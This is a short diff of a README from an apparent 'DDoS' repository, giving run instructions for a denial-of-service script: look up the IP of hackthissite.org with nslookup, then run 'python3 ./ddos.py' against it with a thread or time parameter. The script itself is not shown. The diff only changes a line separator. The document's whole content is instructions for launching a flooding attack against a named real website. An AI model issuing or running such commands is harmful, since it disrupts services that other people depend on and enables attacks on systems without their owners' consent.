kevin1105/DDoS/README.md

 # How to Run
 nslookup hackthissite.org
-\nthen get the Ip Address
+| then get the Ip Address
 #
 python3 ./ddos.py -s ipAddress -t 155